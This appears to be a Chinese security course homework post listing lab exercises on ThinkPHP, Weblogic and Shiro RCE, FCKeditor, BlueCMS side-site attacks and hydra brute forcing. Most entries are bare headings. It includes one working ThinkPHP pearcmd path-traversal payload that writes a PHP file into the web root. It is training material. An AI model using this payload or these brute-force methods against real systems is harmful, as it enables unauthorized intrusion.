@所有人 网络安全C10-2024.11.9
作业:
- RCE:分别实现ThinkPHP、Weblogic、Shiro漏洞的利用过程
ThinkPHP
?lang=../../../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/<?
=phpinfo()?>+/var/www/html/magedu1.php
Weblogic
方式1
方式2
Shiro漏洞
CVE-2016-4437
工具1
工具2
CVE-2020-1957
- FCKeditor编辑器漏洞实验;
- bluecms旁注漏洞,并解释为什么旁站攻击可以拿下主站?跨库的意思是什么?
旁站攻击可以拿下主站原因:旁站与主站的服务部署在同一服务器上,当拿下旁站时,可以通过数据库等其他手段getshell,等于拿下主站
跨库的意思是什么:在同一服务器中,数据库管理系统是共享的,当拿下其中一端口所对应的web服务时,可以通过操作数据库从而实现sql跨库查询来获取其他数据库文件信息
4、暴力猜解:hydra实现对ftp、ssh、rdp、mysql的暴力破解。
ftp
Ssh
rdp远程桌面
mysql
